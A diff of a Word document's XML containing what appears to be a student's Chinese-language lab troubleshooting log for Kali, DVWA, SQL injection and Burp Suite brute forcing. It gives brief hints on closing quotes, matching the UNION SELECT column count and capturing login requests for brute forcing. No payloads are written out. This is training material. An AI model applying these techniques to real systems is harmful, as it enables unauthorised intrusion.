         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1529,6 +2204,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="16"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>问题1：虚拟机桥接模式无法联网</w:t>
@@ -1558,6 +2236,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="16"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>问题2：Kali系统更新失败、软件安装报错</w:t>
@@ -1602,6 +2283,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1620,6 +2302,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="17"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>问题1：DVWA访问报错（数据库连接失败）</w:t>
@@ -1629,6 +2314,7 @@
       <w:pPr>
         <w:ind w:left="720"/>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -1657,6 +2343,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>②成功开启</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -1759,6 +2446,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="17"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>问题2：</w:t>
@@ -1868,6 +2558,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="17"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>问题3：</w:t>
@@ -2001,6 +2694,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="17"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>问题4：</w:t>
@@ -2083,6 +2779,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -2098,6 +2795,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -2118,8 +2816,25 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>问题1：手动注入Payload执行报错（单引号闭合失败）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>1后面忘记输入单引号“’”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2130,15 +2845,59 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>问题2：</w:t>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>问题2：闭合单引号后仍报错</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>严格执行select前后的字段数保持一致，实际注入过程中，原网页只有两个字段值</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>“First name”和“surname”，select后也一定要保持两个字段，否则无法注入，select 1就是</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>盲注无</w:t>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>当做</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>返回结果（无法判断注入是否成功）</w:t>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>凑数去补齐不足的字段数的。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2149,12 +2908,132 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>问题3：DVWA切换安全级别后注入失败</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>问题3：使用Burp时捕获不到来自DVWA的数据包</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>①使用kali内置浏览器：在抓包前要先设置kali浏览器的网络代理为127.0.0.1，端口为8080，与Burp保持一致，否则获取不到。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>②还是抓不到包：使用Burp自带的谷歌浏览器去访问DVWA。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>在谷歌浏览器操作时，Burp的intercept要先关闭，否则谷歌无法访问网页，在访问到登录界面的时候在将其打开</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>，点击login，这时就会抓到登录的数据包了，可以开始分析爆破</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>问题4：爆破找不到结果</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>可以在攻击的页面提前设置显示最终爆破结果。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>问题</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>盲注无</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>返回结果（无法判断注入是否成功）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -2173,6 +3052,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="19"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>问题1：</w:t>
@@ -2192,6 +3074,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="19"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>问题2：Burp Suite抓不到包（代理配置错误）</w:t>
@@ -2203,6 +3088,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="19"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>问题3：</w:t>
@@ -2219,6 +3107,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -2237,6 +3126,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="20"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>问题1：MySQL登录失败（密码忘记、认证插件不兼容）</w:t>
@@ -2248,6 +3140,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="20"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>问题2：密码破解工具无法运行（命令错误、文件格式错误）</w:t>
@@ -2259,6 +3154,9 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="20"/>
         </w:numPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t>问题3：GitHub上传文档/截图失败</w:t>
@@ -2267,6 +3165,7 @@
     <w:p>
       <w:pPr>
         <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
           <w:b/>
           <w:bCs/>
         </w:rPr>
@@ -2280,17 +3179,33 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:t>1. 每个问题均对应“问题描述→报错截图（对应仓库screenshots文件夹）→原因分析→解决步骤→验证结果”，全程贴合本人实操过程；</w:t>
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:t>2. 实验代码均为本人实操过程中实际使用，无复制粘贴，可结合仓库截图交叉核验；</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>3. 复制到Word后，更新目录即可实现跳转，建议将目录放在文档开头，方便快速查阅。</w:t>
       </w:r>
     </w:p>
@@ -6016,6 +6931,7 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
